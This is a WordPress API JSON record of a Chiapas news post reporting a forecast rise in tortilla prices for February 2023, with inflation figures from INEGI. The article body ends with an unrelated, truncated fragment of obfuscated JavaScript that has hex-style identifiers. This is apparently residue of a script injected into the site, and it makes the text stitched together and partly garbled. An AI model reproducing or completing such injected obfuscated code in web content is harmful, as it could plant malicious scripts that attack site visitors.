{"id":7680,"date":"2022-12-29T03:12:07","date_gmt":"2022-12-29T03:12:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7680"},"modified":"2022-12-29T03:12:07","modified_gmt":"2022-12-29T03:12:07","slug":"malas-noticias-subira-la-tortilla-en-febrero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7680","title":{"rendered":"Malas noticias, subir\u00e1 la tortilla en febrero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1672283470856.jpg\" alt=\"\" class=\"wp-image-7681\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1672283470856.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1672283470856-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.28 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Jos\u00e9 Ram\u00f3n Salazar Ballinas, presidente del Grupo de Industriales de la Masa y la Tortilla Somos Chiapas, dio a conocer que, derivado de diferentes factores el pr\u00f3ximo mes de febrero habr\u00e1 un ajuste en el precio del kilogramo de la tortilla, en algunos lugares podr\u00e1 alcanzar los 25 pesos. Los tortilleros dan a conocer que,  para febrero del 2023, podr\u00eda darse un incremento en sus precios, al grado que podr\u00eda llegar entre 24 a 25 pesos el kilo de la tortilla.Salazar Ballinas, dio a conocer  que el primero de enero del 2023 en algunos municipios se ajusta el costo de 20 a 22 pesos por kilo. Mientras que, en los municipios cuyos costos es de 22 pesos el kilo, subir\u00e1 hasta 24 pesos en febrero.De acuerdo con el Instituto Nacional de Estad\u00edstica y Geograf\u00eda (Inegi) dio a conocer el \u00cdndice Nacional de Precios al Consumidor (INPC) correspondiente a la primera quincena de diciembre, en el que destaca que durante este periodo se present\u00f3 una variaci\u00f3n de 0.39 por ciento respecto a la quincena anterior.  Con este resultado, la inflaci\u00f3n general anual se ubic\u00f3 en 7.77 por ciento, generando alza de precios en diversas mercanc\u00edas y servicios.Por lo anterior, el Inegi expone que las mercanc\u00edas no alimenticias fueron los que presentaron la mayor variaci\u00f3n en la primera quincena de diciembre, con 0.78 por ciento, seguido de las mercanc\u00edas con una variaci\u00f3n de 0.62 por ciento, y de los servicios con una variaci\u00f3n quincenal de 0.51 por ciento.Salazar Ballinas dijo que:  &#8220;Por lo mismo, que, los incrementos que se han dado ahorita en refacciones, todo lo que es acero, fierro, ha subido much\u00edsimo exponencialmente y a partir de febrero que se ten\u00eda el pacto que ten\u00eda con las harineras pues se prev\u00e9 un incremento fuerte otra vez\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.28 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Jos\u00e9 Ram\u00f3n Salazar Ballinas, presidente del Grupo de Industriales de la Masa y la Tortilla Somos Chiapas, dio a conocer que, derivado de diferentes factores el pr\u00f3ximo mes de febrero habr\u00e1 un ajuste en el precio del kilogramo de la tortilla, en algunos lugares podr\u00e1 alcanzar los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7681,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-7680","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7680","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7680"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7680\/revisions"}],"predecessor-version":[{"id":7682,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7680\/revisions\/7682"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7681"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7680"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7680"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7680"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}